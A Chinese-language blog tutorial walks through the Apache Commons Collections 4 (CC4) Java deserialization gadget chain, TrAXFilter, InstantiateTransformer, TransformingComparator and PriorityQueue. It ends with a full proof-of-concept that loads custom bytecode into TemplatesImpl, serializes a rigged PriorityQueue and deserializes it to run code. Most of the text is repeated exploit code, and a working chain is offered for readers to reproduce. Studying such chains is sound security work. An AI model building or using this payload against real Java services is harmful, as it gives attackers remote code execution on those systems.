java反序列化之CC4超详细易懂分析

java反序列化之CC4超详细易懂分析

前言

当然，学习这个链子之前，你得好好把cc3和cc2给看明白，这样你学起来就会很简单，因为cc4就是cc2+cc3，当然这里我会再给你讲解一下类的作用，顺便给我复习，也给你讲明白，写得不容易，免费的赞点一下吧

分析

代码框架

首先是写一个代码的框架，这个框架多写写好吧

package CC4;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
public class CC4 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException {

  
    }

    public static void serilize(Object obj) throws IOException {
        ObjectOutputStream  oos= new ObjectOutputStream(Files.newOutputStream(Paths.get("1.bin")));
        oos.writeObject(obj);
    }

    public static void unserilize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois= new ObjectInputStream(Files.newInputStream(Paths.get(filename)));
        ois.readObject();
    }
    public static void setFieldValue(Object obj, String field, Object value) throws NoSuchFieldException, IllegalAccessException {
        Class<?> clazz = obj.getClass();
        Field fieldName = clazz.getDeclaredField(field);
        fieldName.setAccessible(true);
        fieldName.set(obj, value);
    }

}

TrAXFilter类

因为我们这里涉及到cc3，所以触发newtransform方法是在所难免，我们看到这个类的构造方法

public TrAXFilter(Templates templates)  throws
        TransformerConfigurationException
    {
        _templates = templates;
        _transformer = (TransformerImpl) templates.newTransformer();
        _transformerHandler = new TransformerHandlerImpl(_transformer);
        _useServicesMechanism = _transformer.useServicesMechnism();
    }

只需要实例化就可以触发templates.newTransformer()，而且templates我们是可以控制的
我们试着这样触发一下链子

package CC4;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
public class CC4 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException {

        byte[] code = Files.readAllBytes(Paths.get("F:\\IntelliJ IDEA 2023.3.2\\java脚本\\CC2\\target\\classes\\cc2\\TestTemplatesImpl.class"));
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "xxx");
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        setFieldValue(templates, "_bytecodes", new byte[][]{code});
        TrAXFilter trAXFilter =new TrAXFilter(templates);

    }

    public static void serilize(Object obj) throws IOException {
        ObjectOutputStream  oos= new ObjectOutputStream(Files.newOutputStream(Paths.get("1.bin")));
        oos.writeObject(obj);
    }

    public static void unserilize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois= new ObjectInputStream(Files.newInputStream(Paths.get(filename)));
        ois.readObject();
    }
    public static void setFieldValue(Object obj, String field, Object value) throws NoSuchFieldException, IllegalAccessException {
        Class<?> clazz = obj.getClass();
        Field fieldName = clazz.getDeclaredField(field);
        fieldName.setAccessible(true);
        fieldName.set(obj, value);
    }

}

但是怎么触发构造方法，看下面

InstantiateTransformer

只看重点

public T transform(Class<? extends T> input) {
        try {
            if (input == null) {
                throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a null object");
            } else {
                Constructor<? extends T> con = input.getConstructor(this.iParamTypes);
                return con.newInstance(this.iArgs);
            }

可以看到这个类的transform方法是可以实例化一个类的，md不正好和上面的连起来了吗
简单梳理一下逻辑
我们实例化InstantiateTransformer，然后调用它的transform方法会实例化我们传入的参数，就是TrAXFilter，然后它实例化后传入的是templates，就会调用它的newTransformer()，这就是链子

package CC4;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
public class CC4 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException {

        byte[] code = Files.readAllBytes(Paths.get("F:\\IntelliJ IDEA 2023.3.2\\java脚本\\CC2\\target\\classes\\cc2\\TestTemplatesImpl.class"));
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "xxx");
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        setFieldValue(templates, "_bytecodes", new byte[][]{code});

      InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
      instantiateTransformer.transform(TrAXFilter.class);

    }

    public static void serilize(Object obj) throws IOException {
        ObjectOutputStream  oos= new ObjectOutputStream(Files.newOutputStream(Paths.get("1.bin")));
        oos.writeObject(obj);
    }

    public static void unserilize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois= new ObjectInputStream(Files.newInputStream(Paths.get(filename)));
        ois.readObject();
    }
    public static void setFieldValue(Object obj, String field, Object value) throws NoSuchFieldException, IllegalAccessException {
        Class<?> clazz = obj.getClass();
        Field fieldName = clazz.getDeclaredField(field);
        fieldName.setAccessible(true);
        fieldName.set(obj, value);
    }

}

运行也是成功弹出，不截图了
但是怎么去触发它的transform方法呢？看下面

TransformingComparator

我们看到它的compare方法

public int compare(I obj1, I obj2) {
        O value1 = this.transformer.transform(obj1);
        O value2 = this.transformer.transform(obj2);
        return this.decorated.compare(value1, value2);
    }

我们只需要触发compare就好了

package CC4;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
public class CC4 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException {

        byte[] code = Files.readAllBytes(Paths.get("F:\\IntelliJ IDEA 2023.3.2\\java脚本\\CC2\\target\\classes\\cc2\\TestTemplatesImpl.class"));
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "xxx");
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        setFieldValue(templates, "_bytecodes", new byte[][]{code});

        InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
        TransformingComparator transformingComparator =new TransformingComparator(instantiateTransformer);
        transformingComparator.compare(TrAXFilter.class,TrAXFilter.class);


    }

    public static void serilize(Object obj) throws IOException {
        ObjectOutputStream  oos= new ObjectOutputStream(Files.newOutputStream(Paths.get("1.bin")));
        oos.writeObject(obj);
    }

    public static void unserilize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois= new ObjectInputStream(Files.newInputStream(Paths.get(filename)));
        ois.readObject();
    }
    public static void setFieldValue(Object obj, String field, Object value) throws NoSuchFieldException, IllegalAccessException {
        Class<?> clazz = obj.getClass();
        Field fieldName = clazz.getDeclaredField(field);
        fieldName.setAccessible(true);
        fieldName.set(obj, value);
    }

}

运行还是成功弹出了计算器，但是怎么去出触发我们的compare方法呢？

PriorityQueue

我们看到它的siftDownUsingComparator方法

private void siftDownUsingComparator(int k, E x) {
        int half = size >>> 1;
        while (k < half) {
            int child = (k << 1) + 1;
            Object c = queue[child];
            int right = child + 1;
            if (right < size &&
                comparator.compare((E) c, (E) queue[right]) > 0)
                c = queue[child = right];
            if (comparator.compare(x, (E) c) <= 0)
                break;
            queue[k] = c;
            k = child;
        }
        queue[k] = x;
    }

这个类也是最终类，前面我的文章是讲过的，可以移步看看，这里我就简单给一个链子

PriorityQueue.readobject—heapify()–siftDown()—siftDownUsingComparator()—comparator.compare()

所以分析到这，其实就是我们最终一步了

poc

package CC4;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import org.apache.commons.collections4.Transformer;
import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;


public class CC4 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException, ClassNotFoundException {

        byte[] code = Files.readAllBytes(Paths.get("F:\\IntelliJ IDEA 2023.3.2\\java脚本\\CC2\\target\\classes\\cc2\\TestTemplatesImpl.class"));
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "xxx");
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        setFieldValue(templates, "_bytecodes", new byte[][]{code});
//    1.TrAXFilter trAXFilter =new TrAXFilter(templates);

//    2.  InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
//        instantiateTransformer.transform(TrAXFilter.class);
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});

        Transformer[] transformers = {
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer("qingfeng"));//传入假的，防止add弹

        PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);

        Class<? extends TransformingComparator> transformingComparatorClass = transformingComparator.getClass();
        Field transformerField = transformingComparatorClass.getDeclaredField("transformer");
        transformerField.setAccessible(true);
        transformerField.set(transformingComparator, chainedTransformer);

        serilize(priorityQueue);
        unserilize("1.bin");
    }


    public static void serilize(Object obj) throws IOException {
        ObjectOutputStream  oos= new ObjectOutputStream(Files.newOutputStream(Paths.get("1.bin")));
        oos.writeObject(obj);
    }

    public static void unserilize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois= new ObjectInputStream(Files.newInputStream(Paths.get(filename)));
        ois.readObject();
    }
    public static void setFieldValue(Object obj, String field, Object value) throws NoSuchFieldException, IllegalAccessException {
        Class<?> clazz = obj.getClass();
        Field fieldName = clazz.getDeclaredField(field);
        fieldName.setAccessible(true);
        fieldName.set(obj, value);
    }

}

这就是完整的链子了

总结

priorityQueue.readobject()—TransformingComparator.compare()—ChainTransfromer.transform—后面的就是老样子